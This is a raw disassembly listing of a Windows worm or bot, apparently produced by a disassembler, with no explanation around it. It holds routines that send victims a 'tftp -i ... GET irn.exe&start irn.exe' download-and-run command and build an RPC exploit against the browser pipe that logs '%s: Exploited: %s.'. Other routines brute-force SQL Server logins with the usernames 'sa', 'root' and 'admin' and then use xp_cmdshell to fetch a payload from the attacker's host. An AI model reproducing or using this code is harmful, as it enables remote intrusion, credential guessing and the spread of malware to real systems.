push ebx
push 400h
lea eax, [ebp+var_5A4]
push eax
push edi
call ds:dword_41D26C ; recv
push dword_42851C
lea esi, [ebp+var_14]
push 10h
pop ecx
call sub_4197F4
mov eax, esi
push eax
push offset aTftpISGetIrn_e ; "tftp -i %s GET irn.exe&start irn.exe&ex"...
lea eax, [ebp+var_1A4]
push 18Fh
push eax
call sub_402EBA
lea eax, [ebp+var_1A4]
add esp, 14h
lea esi, [eax+1]
loc_41ACDE: ; CODE XREF: sub_41ABCA+119j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41ACDE
push ebx
sub eax, esi
push eax
lea eax, [ebp+var_1A4]
push eax
push edi
call ds:dword_41D228 ; send
cmp eax, 0FFFFFFFFh
pop esi
jnz short loc_41AD0B
loc_41ACFD: ; CODE XREF: sub_41ABCA+143j
push edi
call ds:dword_41D280 ; closesocket
mov al, bl
jmp loc_41AC6D
; ---------------------------------------------------------------------------
loc_41AD0B: ; CODE XREF: sub_41ABCA+131j
mov bl, 1
jmp short loc_41ACFD
sub_41ABCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD0F proc near ; DATA XREF: .data:004245A8o
var_124 = byte ptr -124h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 124h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [ebp+var_124]
rep movsd
mov edi, [ebp+var_20]
push [ebp+var_1C]
mov [ebp+var_14], 2
mov [ebp+var_10], edi
call ds:dword_41D270 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
call ds:dword_41D220 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41AD77
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call ds:dword_41D23C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41AD87
push esi
loc_41AD71: ; CODE XREF: sub_41AD0F+8Fj
call ds:dword_41D280 ; closesocket
loc_41AD77: ; CODE XREF: sub_41AD0F+4Dj
; sub_41AD0F+A0j
xor al, al
loc_41AD79: ; CODE XREF: sub_41AD0F+B2j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402ADC
leave
retn
; ---------------------------------------------------------------------------
loc_41AD87: ; CODE XREF: sub_41AD0F+5Fj
push 0
push 1213h
push offset dword_4245E0
push esi
call ds:dword_41D228 ; send
cmp eax, 0FFFFFFFFh
push esi
jz short loc_41AD71
call ds:dword_41D280 ; closesocket
push edi
call sub_41ABCA
test al, al
pop ecx
jz short loc_41AD77
mov eax, [ebp+var_24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
inc dword ptr [eax]
mov al, 1
jmp short loc_41AD79
sub_41AD0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C4h
sub_41ADC3 proc near ; CODE XREF: sub_40207D+E0p
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_335 = byte ptr -335h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2C4h]
sub esp, 344h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2C4h+var_4], eax
push ebx
push esi
push edi
push 0Bh
pop ecx
mov esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
lea edi, [ebp+2C4h+var_34]
rep movsd
movsw
mov ebx, 100h
movsb
push ebx
xor esi, esi
lea eax, [ebp+2C4h+var_334]
push esi
push eax
call sub_407F20
push 4
push offset dword_428750
push offset aMhz ; "~MHz"
lea eax, [ebp+2C4h+var_34]
push eax
push 4
call sub_4176BD
add esp, 20h
test al, al
jz loc_41AFDB
push ebx
lea eax, [ebp+2C4h+var_334]
push eax
push offset aProcessornames ; "ProcessorNameString"
lea eax, [ebp+2C4h+var_34]
push eax
push 1
call sub_4176BD
add esp, 14h
test al, al
jz loc_41AF1B
mov edi, 0FFh
push edi
lea eax, [ebp+2C4h+var_133]
push esi
push eax
mov [ebp+2C4h+var_335], 0
mov [ebp+2C4h+var_134], 0
call sub_407F20
lea eax, [ebp+2C4h+var_334]
push eax
push offset aS_7 ; "%s"
lea eax, [ebp+2C4h+var_134]
push edi
push eax
call sub_402EBA
lea eax, [ebp+2C4h+var_134]
add esp, 1Ch
lea esi, [eax+1]
loc_41AE8E: ; CODE XREF: sub_41ADC3+D0j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41AE8E
sub eax, esi
push ebx
push 0
mov esi, offset byte_428650
push esi
mov [ebp+eax+2C4h+var_134], cl
call sub_407F20
add esp, 0Ch
xor ecx, ecx
mov [ebp+2C4h+var_33C], ecx
loc_41AEB4: ; CODE XREF: sub_41ADC3+154j
cmp [ebp+2C4h+var_335], 0
jnz short loc_41AECB
cmp [ebp+ecx+2C4h+var_134], 20h
jz short loc_41AEFB
mov [ebp+2C4h+var_335], 1
dec ecx
jmp short loc_41AEFB
; ---------------------------------------------------------------------------
loc_41AECB: ; CODE XREF: sub_41ADC3+F5j
movsx eax, [ebp+ecx+2C4h+var_134]
push eax
push esi
push offset aSC_0 ; "%s%c"
push edi
push esi
call sub_402EBA
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41AEE9: ; CODE XREF: sub_41ADC3+12Bj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AEE9
sub eax, ecx
mov ecx, [ebp+2C4h+var_33C]
mov byte_428650[eax], dl
loc_41AEFB: ; CODE XREF: sub_41ADC3+FFj
; sub_41ADC3+106j
lea eax, [ebp+2C4h+var_134]
inc ecx
lea edx, [eax+1]
mov [ebp+2C4h+var_33C], ecx
mov [ebp+2C4h+var_344], edx
loc_41AF0B: ; CODE XREF: sub_41ADC3+14Dj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AF0B
sub eax, [ebp+2C4h+var_344]
cmp ecx, eax
jbe short loc_41AEB4
jmp short loc_41AF4E
; ---------------------------------------------------------------------------
loc_41AF1B: ; CODE XREF: sub_41ADC3+85j
push ebx
push esi
mov esi, offset byte_428650
push esi
call sub_407F20
push offset aUnknown ; "Unknown"
mov edi, 0FFh
push edi
push esi
call sub_402EBA
add esp, 18h
lea eax, [esi+1]
loc_41AF3F: ; CODE XREF: sub_41ADC3+181j
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41AF3F
sub esi, eax
mov byte_428650[esi], cl
loc_41AF4E: ; CODE XREF: sub_41ADC3+156j
and dword_428754, 0
mov [ebp+2C4h+var_33C], 1
loc_41AF5C: ; CODE XREF: sub_41ADC3+20Dj
inc dword_428754
push ebx
lea eax, [ebp+2C4h+var_234]
push 0
push eax
call sub_407F20
push [ebp+2C4h+var_33C]
lea eax, [ebp+2C4h+var_234]
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push edi
push eax
call sub_402EBA
lea eax, [ebp+2C4h+var_234]
add esp, 1Ch
lea esi, [eax+1]
loc_41AF92: ; CODE XREF: sub_41ADC3+1D4j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41AF92
sub eax, esi
mov [ebp+eax+2C4h+var_234], cl
lea eax, [ebp+2C4h+var_340]
push eax
push 1
push 0
lea eax, [ebp+2C4h+var_234]
push eax
push 80000002h
call ds:off_41D02C
test eax, eax
jnz short loc_41AFD2
push [ebp+2C4h+var_340]
call ds:off_41D010
inc [ebp+2C4h+var_33C]
cmp [ebp+2C4h+var_33C], 8
jb short loc_41AF5C
loc_41AFD2: ; CODE XREF: sub_41ADC3+1FBj
push [ebp+2C4h+var_340]
call ds:off_41D010
loc_41AFDB: ; CODE XREF: sub_41ADC3+62j
mov ecx, [ebp+2C4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 2C4h
leave
retn
sub_41ADC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AFF3 proc near ; CODE XREF: sub_413DDD+20Cp
; sub_413DDD+31Dp ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_3C = dword ptr 44h
arg_40 = byte ptr 48h
arg_4C = dword ptr 54h
arg_50 = byte ptr 58h
arg_54 = byte ptr 5Ch
arg_68 = dword ptr 70h
arg_78 = dword ptr 80h
arg_7C = word ptr 84h
arg_80 = dword ptr 88h
arg_84 = word ptr 8Ch
arg_88 = dword ptr 90h
arg_8C = dword ptr 94h
arg_90 = word ptr 98h
arg_94 = byte ptr 9Ch
arg_98 = dword ptr 0A0h
arg_9C = dword ptr 0A4h
arg_A0 = dword ptr 0A8h
arg_A4 = dword ptr 0ACh
arg_A8 = byte ptr 0B0h
arg_AC = word ptr 0B4h
arg_AE = word ptr 0B6h
arg_B0 = dword ptr 0B8h
arg_B4 = word ptr 0BCh
arg_B6 = word ptr 0BEh
arg_B8 = dword ptr 0C0h
arg_BC = dword ptr 0C4h
arg_C0 = word ptr 0C8h
arg_C2 = byte ptr 0CAh
arg_C4 = byte ptr 0CCh
arg_D4 = dword ptr 0DCh
arg_D8 = byte ptr 0E0h
arg_E8 = dword ptr 0F0h
arg_EC = byte ptr 0F4h
arg_1EC = dword ptr 1F4h
arg_1F0 = dword ptr 1F8h
arg_1F8 = dword ptr 200h
arg_1FD = byte ptr 205h
arg_200 = byte ptr 208h
arg_201 = byte ptr 209h
arg_210 = byte ptr 218h
arg_211 = byte ptr 219h
arg_310 = byte ptr 318h
arg_311 = byte ptr 319h
arg_40C = byte ptr 414h
arg_240C = byte ptr 2414h
arg_4410 = byte ptr 4418h
arg_6410 = dword ptr 6418h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 641Ch
call sub_4117B0
mov eax, dword_423064
xor eax, esp
mov [esp+arg_6410], eax
push ebx
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [esp+0Ch+arg_EC]
rep movsd
mov eax, [esp+0Ch+arg_1F0]
push eax
mov [esp+10h+arg_20], eax
call ds:dword_41D25C ; inet_ntoa
xor ebx, ebx
mov [esp+0Ch+arg_14], eax
mov [esp+0Ch+arg_8], ebx
loc_41B03F: ; CODE XREF: sub_41AFF3+710j
cmp [esp+0Ch+arg_8], 2
ja loc_41B712
push offset a_ ; "."
push [esp+10h+arg_14]
call sub_402C75
test eax, eax
pop ecx
pop ecx
jz short loc_41B0B2
push [esp+0Ch+arg_14]
lea eax, [esp+10h+arg_40C]
push offset aSIpc ; "\\\\%s\\ipc$"
push 2000h
push eax
call sub_402EBA
add esp, 10h
push 8
pop ecx
xor eax, eax
push ebx
lea edi, [esp+10h+arg_54]
rep stosd
lea eax, [esp+10h+arg_40C]
push offset byte_41EEFE
mov [esp+14h+arg_68], eax
push offset byte_41EEFF
lea eax, [esp+18h+arg_54]
push eax
call sub_402A0E
test eax, eax
jnz loc_41B712
loc_41B0B2: ; CODE XREF: sub_41AFF3+69j
push [esp+0Ch+arg_14]
lea eax, [esp+10h+arg_240C]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push 2000h
push eax
call sub_402EBA
add esp, 10h
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
lea eax, [esp+24h+arg_240C]
push eax
call ds:off_41D06C
cmp eax, 0FFFFFFFFh
mov [esp+0Ch+arg_0], eax
jz loc_41B712
push 48h
lea eax, [esp+10h+arg_A4]
push ebx
push eax
call sub_407F20
mov byte ptr [esp+18h+arg_A4], 5
mov byte ptr [esp+18h+arg_A4+1], bl
mov byte ptr [esp+18h+arg_A4+2], 0Bh
mov byte ptr [esp+18h+arg_A4+3], 3
mov dword ptr [esp+18h+arg_A8], 10h
mov [esp+18h+arg_AC], 48h
mov [esp+18h+arg_AE], bx
mov [esp+18h+arg_B0], ebx
mov [esp+18h+arg_B4], 10B8h
mov [esp+18h+arg_B6], 10B8h
mov [esp+18h+arg_B8], ebx
mov [esp+18h+arg_BC], 1
mov [esp+18h+arg_C0], bx
mov [esp+18h+arg_C2], 1
mov esi, offset dword_41F00C
lea edi, [esp+18h+arg_C4]
movsd
movsd
movsd
movsd
mov [esp+18h+arg_D4], 3
mov esi, offset dword_41F020
lea edi, [esp+18h+arg_D8]
movsd
movsd
add esp, 0Ch
movsd
push 2
movsd
pop esi
push ebx
lea eax, [esp+10h+arg_50]
push eax
push 48h
lea eax, [esp+18h+arg_A4]
push eax
push [esp+1Ch+arg_0]
mov [esp+20h+arg_E8], esi
call ds:off_41D088
test eax, eax
jz loc_41B708
push ebx
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_4]
call ds:off_41D078
call ds:dword_41D104 ; GetTickCount
push eax
call sub_403722
mov edx, 41414141h
mov eax, edx
lea edi, [esp+0Ch+arg_94]
stosd
stosd
stosd
stosd
pop ecx
stosd
push 7
pop ecx
mov eax, edx
lea edi, [esp+8+arg_78]
rep stosd
call sub_40372F
mov dword ptr [esp+8+arg_94], eax
xor eax, eax
inc eax
cmp [esp+8+arg_C], eax
mov [esp+8+arg_A0], eax
mov [esp+8+arg_9C], ebx
mov [esp+8+arg_98], eax
mov word ptr [esp+8+arg_A4], bx
jnz short loc_41B272
mov dword ptr [esp+8+arg_84], eax
mov dword ptr [esp+8+arg_7C], eax
mov [esp+8+arg_88], ebx
jmp short loc_41B291
; ---------------------------------------------------------------------------
loc_41B272: ; CODE XREF: sub_41AFF3+266j
cmp [esp+8+arg_C], ebx
jnz short loc_41B298
mov dword ptr [esp+8+arg_84], esi
mov dword ptr [esp+8+arg_7C], esi
mov [esp+8+arg_88], 2EBh
loc_41B291: ; CODE XREF: sub_41AFF3+27Dj
mov [esp+8+arg_80], ebx
loc_41B298: ; CODE XREF: sub_41AFF3+283j
call sub_40372F
cdq
mov esi, 0FAh
mov ecx, esi
idiv ecx
inc edx
mov [esp+8+arg_78], edx
call sub_40372F
cdq
idiv esi
mov eax, [esp+8+arg_C]
shl eax, 4
mov edi, dword_425808[eax]
push edi
mov dword ptr [esp+0Ch+arg_90], ebx
mov [esp+0Ch+arg_1C], eax
mov [esp+0Ch+arg_10], edi
inc edx
mov [esp+0Ch+arg_8C], edx
call sub_403AAC
mov esi, eax
cmp esi, ebx
pop ecx
mov [esp+8+arg_8], esi
jz loc_41B708
lea eax, [edi-2]
push eax
push 90h
push esi
call sub_407F20
lea edi, [esi+edi-2]
xor eax, eax
stosw
mov eax, [esp+14h+arg_1C]
mov eax, dword_425810[eax]
lea edi, [eax+esi]
mov esi, offset dword_4257FC
movsd
movsw
add eax, 7
movsb
mov [esp+14h+arg_14], eax
xor eax, eax
mov [esp+14h+arg_200], bl
lea edi, [esp+14h+arg_201]
stosd
stosd
stosd
stosw
stosb
add esp, 0Ch
mov edi, 0FFh
push edi
lea eax, [esp+0Ch+arg_311]
push ebx
push eax
mov [esp+14h+arg_310], bl
call sub_407F20
add esp, 0Ch
push edi
lea eax, [esp+0Ch+arg_211]
push ebx
push eax
mov [esp+14h+arg_210], bl
call sub_407F20
add esp, 0Ch
cmp [esp+8+arg_1FD], bl
jz loc_41B40B
call sub_419B7D
test al, al
jnz short loc_41B3F2
push dword_42851C
lea esi, [esp+0Ch+arg_200]
push 10h
pop ecx
call sub_4197F4
lea esi, [esp+0Ch+arg_310]
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
mov [esp+0Ch+var_C], 100h
call sub_419F0A
pop ecx
mov eax, esi
push eax
push dword_4280F4
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_0 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402EBA
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41B3E9: ; CODE XREF: sub_41AFF3+3FBj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B3E9
jmp short loc_41B471
; ---------------------------------------------------------------------------
loc_41B3F2: ; CODE XREF: sub_41AFF3+395j
push 100h
lea esi, [esp+0Ch+arg_210]
mov ebx, offset dword_426C0C
call sub_419F0A
pop ecx
jmp short loc_41B47B
; ---------------------------------------------------------------------------
loc_41B40B: ; CODE XREF: sub_41AFF3+388j
push dword_42851C
lea esi, [esp+0Ch+arg_200]
push 10h
pop ecx
call sub_4197F4
lea esi, [esp+0Ch+arg_310]
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
mov [esp+0Ch+var_C], 100h
call sub_419F0A
pop ecx
mov eax, esi
push eax
push dword_4280F4
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_1 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402EBA
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41B46A: ; CODE XREF: sub_41AFF3+47Cj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B46A
loc_41B471: ; CODE XREF: sub_41AFF3+3FDj
sub eax, ecx
mov [esp+eax+8+arg_210], 0
loc_41B47B: ; CODE XREF: sub_41AFF3+416j
lea eax, [esp+8+arg_210]
push eax
call sub_414B1C
mov esi, eax
test esi, esi
pop ecx
jz loc_41B729
push esi
push 1
call sub_4148FB
test eax, eax
pop ecx
pop ecx
jnz short loc_41B4B3
push esi
push 2
call sub_4148FB
test eax, eax
pop ecx
pop ecx
jz loc_41B729
loc_41B4B3: ; CODE XREF: sub_41AFF3+4ACj
mov esi, [esp+8+arg_8]
dec eax
push eax
mov eax, [esp+0Ch+arg_14]
add eax, esi
push offset byte_435638
push eax
call sub_407FA0
mov eax, [esp+14h+arg_1C]
mov eax, dword_42580C[eax]
add esp, 0Ch
cmp [esp+8+arg_C], 1
jnz short loc_41B50A
mov ecx, dword_4357EC
mov [eax+esi], ecx
mov ecx, dword_425824
add eax, 0Ch
mov [eax+esi], ecx
mov ecx, dword_425824
lea eax, [eax+esi+24h]
mov [eax], ecx
mov ecx, dword_425824
mov [eax+0Ch], ecx
jmp short loc_41B524
; ---------------------------------------------------------------------------
loc_41B50A: ; CODE XREF: sub_41AFF3+4E9j
cmp [esp+8+arg_C], 0
jnz short loc_41B524
push 10h
add eax, esi
pop ecx
loc_41B516: ; CODE XREF: sub_41AFF3+52Fj
mov edx, dword_425824
mov [eax], edx
add eax, 4
dec ecx
jnz short loc_41B516
loc_41B524: ; CODE XREF: sub_41AFF3+515j
; sub_41AFF3+51Cj
mov edi, [esp+8+arg_10]
add edi, 42h
push edi
call sub_403AAC
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_41B73F
push edi
push 0
push ebx
call sub_407F20
push 5
pop ecx
lea esi, [esp+14h+arg_94]
mov edi, ebx
rep movsd
mov esi, [esp+14h+arg_10]
mov eax, esi
test eax, eax
mov [esp+14h+arg_10], eax
fild [esp+14h+arg_10]
jge short loc_41B56B
fadd ds:flt_420EF0
loc_41B56B: ; CODE XREF: sub_41AFF3+570j
fmul ds:dbl_420EE8
add esp, 4
fstp [esp+10h+arg_10]
fld [esp+10h+arg_10]
fstp qword ptr [esp]
call sub_404170
fstp [esp+10h+arg_10]
fld [esp+10h+arg_10]
call sub_41C866
and dword ptr [ebx+18h], 0
push esi
push [esp+14h+arg_8]
mov [ebx+1Ch], eax
mov [ebx+14h], eax
lea eax, [ebx+20h]
push eax
call sub_407FA0
add esp, 14h
lea eax, [esi+20h]
jmp short loc_41B5B2
; ---------------------------------------------------------------------------
loc_41B5B1: ; CODE XREF: sub_41AFF3+5C1j
inc eax
loc_41B5B2: ; CODE XREF: sub_41AFF3+5BCj
test al, 3
jnz short loc_41B5B1
push 7
lea edi, [ebx+eax]
pop ecx
push [esp+8+arg_8]
add eax, 1Ch
lea esi, [esp+0Ch+arg_78]
rep movsd
mov [esp+0Ch+arg_14], eax
call sub_4039CF
pop ecx
push 6
xor eax, eax
pop ecx
lea edi, [esp+8+arg_28]
rep stosd
mov byte ptr [esp+8+arg_28+1], al
mov byte ptr [esp+8+arg_28+2], al
lea edi, [esp+8+arg_40]
stosd
xor esi, esi
stosd
stosd
push esi
push esi
stosd
push 1
push esi
mov byte ptr [esp+18h+arg_28], 5
mov byte ptr [esp+18h+arg_28+3], 3
mov [esp+18h+arg_2C], 10h
mov word ptr [esp+18h+arg_30+2], si
mov [esp+18h+arg_34], esi
mov word ptr [esp+18h+arg_3C], si
mov word ptr [esp+18h+arg_3C+2], 1Fh
stosd
call ds:off_41D09C
mov dword ptr [esp+8+arg_50], eax
mov byte ptr [esp+8+arg_0+3], 0
mov [esp+8+arg_8], esi
loc_41B633: ; CODE XREF: sub_41AFF3+6D2j
cmp [esp+8+arg_8], 2
jge loc_41B6CB
inc [esp+8+arg_8]
push 1
push 10B8h
push [esp+10h+arg_14]
lea esi, [esp+14h+arg_28]
push ebx
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [esp+30h+arg_4]
rep movsd
call sub_41755C
add esp, 2Ch
test al, al
jz short loc_41B6CB
cmp dword ptr [esp+8+arg_50], 0
jz short loc_41B6C0
lea eax, [esp+8+arg_40]
push eax
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_4]
call ds:off_41D078
test eax, eax
jnz short loc_41B6A5
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz short loc_41B6C0
loc_41B6A5: ; CODE XREF: sub_41AFF3+6A3j
push 3E8h
push dword ptr [esp+0Ch+arg_50]
call ds:off_41D07C
cmp eax, 102h
jnz short loc_41B6C0
mov byte ptr [esp+8+arg_0+3], 1
loc_41B6C0: ; CODE XREF: sub_41AFF3+67Ej
; sub_41AFF3+6B0j ...
cmp byte ptr [esp+8+arg_0+3], 0
jz loc_41B633
loc_41B6CB: ; CODE XREF: sub_41AFF3+645j
; sub_41AFF3+677j
push [esp+8+arg_4]
mov esi, ds:off_41D0D8
call esi ; sub_4588BA
push ebx
call sub_4039CF
cmp [esp+10h+arg_4C], 0
pop ecx
jz short loc_41B6EB
push [esp+0Ch+arg_4C]
call esi ; sub_4588BA
loc_41B6EB: ; CODE XREF: sub_41AFF3+6F0j
cmp byte ptr [esp+13h], 0
jnz short loc_41B74C
cmp [esp+0Ch+arg_8], 0
jnz short loc_41B712
mov [esp+0Ch+arg_8], 1
xor ebx, ebx
jmp loc_41B03F
; ---------------------------------------------------------------------------
loc_41B708: ; CODE XREF: sub_41AFF3+1E5j
; sub_41AFF3+2F7j
push [esp+8+arg_4]
call ds:off_41D0D8
loc_41B712: ; CODE XREF: sub_41AFF3+51j
; sub_41AFF3+B9j ...
xor al, al
loc_41B714: ; CODE XREF: sub_41AFF3+7ABj
mov ecx, [esp+0Ch+arg_6410]
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402ADC
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B729: ; CODE XREF: sub_41AFF3+49Aj
; sub_41AFF3+4BAj
push [esp+8+arg_4]
call ds:off_41D0D8
push [esp+0Ch+arg_4]
loc_41B737: ; CODE XREF: sub_41AFF3+757j
call sub_4039CF
pop ecx
jmp short loc_41B712
; ---------------------------------------------------------------------------
loc_41B73F: ; CODE XREF: sub_41AFF3+543j
push [esp+8+arg_4]
call ds:off_41D0D8
push esi
jmp short loc_41B737
; ---------------------------------------------------------------------------
loc_41B74C: ; CODE XREF: sub_41AFF3+6FDj
push [esp+0Ch+arg_20]
call ds:dword_41D25C ; inet_ntoa
push eax
mov eax, [esp+10h+arg_1EC]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS_ ; "%s: Exploited: %s."
lea eax, [esp+18h+arg_EC]
push eax
push [esp+1Ch+arg_1F8]
push offset dword_42851C
call sub_417B51
mov eax, [esp+24h+arg_1EC]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
mov al, [esp+13h]
jmp loc_41B714
sub_41AFF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CD8h
sub_41B7A3 proc near ; DATA XREF: .data:0042457Co
var_D54 = dword ptr -0D54h
var_D50 = dword ptr -0D50h
var_D4C = dword ptr -0D4Ch
var_D48 = dword ptr -0D48h
var_D44 = byte ptr -0D44h
var_D40 = dword ptr -0D40h
var_D3C = dword ptr -0D3Ch
var_D38 = dword ptr -0D38h
var_D34 = dword ptr -0D34h
var_D30 = dword ptr -0D30h
var_D2C = dword ptr -0D2Ch
var_D26 = byte ptr -0D26h
var_D25 = byte ptr -0D25h
var_D24 = byte ptr -0D24h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = byte ptr -0C14h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-0CD8h]
sub esp, 0D54h
mov eax, dword_423064
xor eax, ebp
mov [ebp+0CD8h+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+0CD8h+var_14], bl
lea esi, [ebp+0CD8h+arg_0]
lea edi, [ebp+0CD8h+var_D24]
rep movsd
lea edi, [ebp+0CD8h+var_13]
stosd
stosd
stosd
stosw
stosb
mov eax, [ebp+0CD8h+var_C20]
mov [ebp+0CD8h+var_D40], eax
lea eax, [ebp+0CD8h+var_D34]
push eax
push ebx
push 1
mov [ebp+0CD8h+var_D26], bl
mov [ebp+0CD8h+var_D54], offset aSa ; "sa"
mov [ebp+0CD8h+var_D50], offset aRoot ; "root"
mov [ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
mov [ebp+0CD8h+var_D48], ebx
mov [ebp+0CD8h+var_D25], bl
mov [ebp+0CD8h+var_D2C], ebx
mov [ebp+0CD8h+var_D30], ebx
call sub_4029F6
test ax, ax
jz short loc_41B83D
loc_41B823: ; CODE XREF: sub_41B7A3+AEj
xor al, al
loc_41B825: ; CODE XREF: sub_41B7A3+CFj
mov ecx, [ebp+0CD8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 0CD8h
leave
retn
; ---------------------------------------------------------------------------
loc_41B83D: ; CODE XREF: sub_41B7A3+7Ej
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+0CD8h+var_D34]
call sub_4029EA
test ax, ax
jnz short loc_41B823
lea eax, [ebp+0CD8h+var_D2C]
push eax
push [ebp+0CD8h+var_D34]
push 2
call sub_4029F6
test ax, ax
jz short loc_41B874
loc_41B866: ; CODE XREF: sub_41B7A3+22Ej
push [ebp+0CD8h+var_D34]
push 1
call sub_4029FC
mov al, bl
jmp short loc_41B825
; ---------------------------------------------------------------------------
loc_41B874: ; CODE XREF: sub_41B7A3+C1j
mov edi, ds:dword_41D25C
lea ecx, [ebp+0CD8h+var_D54]
mov [ebp+0CD8h+var_D3C], ecx
loc_41B880: ; CODE XREF: sub_41B7A3+1D3j
cmp off_425830, ebx
mov [ebp+0CD8h+var_D38], ebx
jz loc_41B96B
mov esi, [ecx]
mov eax, offset off_425830
loc_41B896: ; CODE XREF: sub_41B7A3+16Bj
lea ecx, [ebp+0CD8h+var_D26]
push ecx
push dword ptr [eax]
push esi
push [ebp+0CD8h+var_C1C]
push [ebp+0CD8h+var_D40]
call edi ; inet_ntoa
push eax
lea eax, [ebp+0CD8h+var_414]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_403481
lea eax, [ebp+0CD8h+var_414]
add esp, 1Ch
lea ecx, [eax+1]
loc_41B8C6: ; CODE XREF: sub_41B7A3+128j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41B8C6
push ebx
sub eax, ecx
lea ecx, [ebp+0CD8h+var_D44]
push ecx
push 400h
lea ecx, [ebp+0CD8h+var_C14]
push ecx
push eax
lea eax, [ebp+0CD8h+var_414]
push eax
push ebx
push [ebp+0CD8h+var_D2C]
call sub_4029F0
movzx eax, ax
cmp ax, bx
jz short loc_41B912
cmp ax, 1
jz short loc_41B912
inc [ebp+0CD8h+var_D38]
mov eax, [ebp+0CD8h+var_D38]
lea eax, ds:425830h[eax*4]
cmp [eax], ebx
jnz short loc_41B896
jmp short loc_41B96B
; ---------------------------------------------------------------------------
loc_41B912: ; CODE XREF: sub_41B7A3+154j
; sub_41B7A3+15Aj
lea eax, [ebp+0CD8h+var_D30]
push eax
push [ebp+0CD8h+var_D2C]
push 3
call sub_4029F6
push dword_42851C
lea esi, [ebp+0CD8h+var_14]
push 10h
pop ecx
call sub_4197F4
mov eax, esi
push eax
lea eax, [ebp+0CD8h+var_814]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_403481
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp+0CD8h+var_814]
push eax
push [ebp+0CD8h+var_D30]
call sub_402A02
test ax, ax
jz short loc_41B97E
push [ebp+0CD8h+var_D30]
push 3
call sub_4029FC
